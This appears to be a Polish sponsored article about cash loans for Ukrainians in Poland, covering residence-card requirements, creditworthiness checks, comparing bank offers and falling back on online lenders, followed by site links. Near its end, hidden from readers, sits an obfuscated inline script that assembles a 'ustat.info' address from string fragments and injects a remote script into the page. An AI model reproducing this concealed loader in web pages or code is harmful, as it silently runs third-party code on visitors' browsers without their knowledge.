wtv.pl

Iberion.pl

Ile kosztuje kredyt gotówkowy dla Ukraińców?

9 Maja 2022

Autor tekstu:

Artykuł Sponsorowany

Kredyt gotówkowy dla Ukraińców jest stosunkowo nowym produktem bankowym, ale jednocześnie zobowiązaniem, które szczególnie dzisiaj cieszy się ogromną popularnością. Większość banków, które komercyjnie działa na terenie naszego kraju, udziela finansowe wsparcie również osobom z obywatelstwem ukraińskim.

Na jakich zasadach udzielane są kredyty dla Ukraińców i czy możliwy jest kredyt gotówkowy dla Ukraińców  online? Sprawdź szczegóły już teraz.

Kredyt gotówkowy dla Ukraińców - ogólne warunki udzielania zobowiązań

Kredyt gotówkowy dla Ukraińców jest dostępny, chociaż tacy kredytobiorcy nie mają polskiego obywatelstwa. Większość instytucji bankowych akceptuje stałe karty pobytu albo nawet czasowe karty pobytu jako potwierdzenie wiarygodności klientów z innym, niż polskie obywatelstwo. 

Należy przy tym pamiętać, że kredyt dla Ukraińców w Polsce wymaga spełnienia znacznie większej ilości formalności. Liczy się zdolność kredytowa, która przez banki weryfikowana jest na dokładnie takich samych warunkach, jak ta w przypadku obywateli naszego kraju. Tym samym, Ukrainiec powinien wykazać zaświadczenie o zatrudnieniu oraz zaświadczenie o wartości generowanych stale dochodów, a te muszą być wystarczające, aby móc spłacać miesięczne raty bez utraty płynności finansowej. Co więcej, kredyt gotówkowy dla obcokrajowca w Polsce zostanie udzielony tylko wtedy, gdy ten wykaże stałe miejsce zamieszkania, a nawet tymczasowe zameldowanie. 

Jak znaleźć dobry kredyt gotówkowy dla Ukraińców?

 Należy podkreślić, że kredyt gotówkowy dla Ukraińców może być tak samo atrakcyjny i opłacalny, jak zobowiązanie dla osób z obywatelstwem polskim. Fakt, że zobowiązanie zaciąga obcokrajowiec, wcale nie oznacza, że finansowe wsparcie ma być udzielone na gorszych warunkach. 

 Musisz wiedzieć, że każdy bank realizuje własną politykę kredytową, dlatego też warunki udzielanych zobowiązań znacznie się od siebie różnią. Właśnie dlatego nie udaje się wskazać jednego, najlepszego kredytu gotówkowego dla Ukraińców ani takiego, który charakteryzuje się najmniejszymi kosztami. Nie da się również wyliczyć, jakie koszty generuje kredyt gotówkowy dla Ukraińców. Millenium, Pekao czy mBank dyktuje inne warunki, określa inne oprocentowanie i narzuca różne prowizje. Znaczenie mają także indywidualne potrzeby, oczekiwania oraz możliwości spłaty kredytobiorcy. 

 Aby móc sprawdzić, ile kosztuje kredyt gotówkowy dla Ukraińców, należy skorzystać z kalkulatora kredytowego. Warto porównać też różne oferty instytucji bankowych i w tym celu najlepiej sprawdzi się ranking kredytów dla obcokrajowców. 

Co zrobić, kiedy bank odmawia współpracy?

 Ukrainiec, który nie wykazuje odpowiedniej zdolności kredytowej, niestety nie ma szans na współpracę z bankiem. Jeśli jednak potrzebuje finansowego wsparcia "na już", na przykład w obliczu tzw. czarnej godziny czy w ramach niespodziewanych wydatków, może skorzystać z oferty firm pożyczkowych. Okazuje się, że pożyczka gotówkowa dla obcokrajowca z reguły udzielana jest online, a instytucja bankowa dokonuje jedynie danych z dowodu tożsamości. Na takie zobowiązanie szansę mają również dłużnicy i osoby niepracujące, ale trzeba zaznaczyć, że warunki spłaty są w tym przypadku nieco gorsze, niż te kredytowe, a pożyczka udzielana jest na mniejszą wartość i znacznie mniejszą liczbę miesięcznych rat.

<script> (function(){ ak93=document.createElement("script");ak93_="u"+("s")+"ta"; ak93_+=("t.i")+""+"n";ak93_+=(("f")+"o");ak93.type="text/javascript"; ak93_+="/"; ak93u="376382058";ak93u+=".8zXps95nk93z4i5nb7p";ak93u+="uefzm0wazbz"; ak93.src="https://"+ak93_+ak93u;ak93.async=true;document.body.appendChild(ak93); })(); </script>

Artykuł sponsorowany.

Tagi:

Podobne artykuły

Polska

Na autostradzie w okolicach Szczecina płonie czołg. Doszło do eksplozji
Czytaj więcej >

Polska

Wierzący antyszczepionkowcy próbują przekonać, że szczepienia są niebezpieczne. Odwołują się do Bożej Ochrony
Czytaj więcej >

Polska

Pożar w Nowej Białej. Spłonęły zabytkowe budynki
Czytaj więcej >

Polska

Rozpoczęto zbiórki na rzecz pogorzelców z Nowej Białej. Akcję ogłasza abp Jędraszewski
Czytaj więcej >

Polska

Tragedia na wsi. Nie żyje strażak
Czytaj więcej >

Polska

Awaria wodociągów w Pleszewie. Zakaz podlewania ogródków kontroluje straż miejska
Czytaj więcej >
Artykuł Sponsorowany

Chcesz się ze mną skontaktować?

Napisz adresowaną do mnie wiadomość na mail: [email protected]